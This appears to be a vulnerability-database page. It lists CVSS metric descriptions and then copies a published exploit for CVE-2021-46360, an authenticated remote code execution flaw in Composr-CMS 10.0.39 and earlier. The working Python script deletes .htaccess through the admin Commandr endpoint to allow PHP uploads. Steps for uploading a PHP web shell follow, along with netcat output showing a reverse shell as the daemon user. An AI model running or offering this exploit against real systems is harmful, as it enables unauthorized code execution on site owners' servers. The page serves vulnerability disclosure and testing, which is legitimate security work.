The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39
# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39
# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 12th January,2022
# CVE ID: CVE-2021-46360
# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
# Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
# Vendor: https://compo.sr/download.htm
###############################################
#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup
import time
cookies = {
'has_cookies': '1',
'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic
'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',
'last_visit': '1641783779',
'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic
}
headers = {
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Origin': 'http://192.168.56.116',
'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',
'Accept-Language': 'en-US,en;q=0.9',
}
params = (
('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic
)
data = {
'_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)
'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic
}
r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
#datap=response.read()
print (soup)
#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (
#Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:
[ci@parrot][~]
$nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ pwd
/
$
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum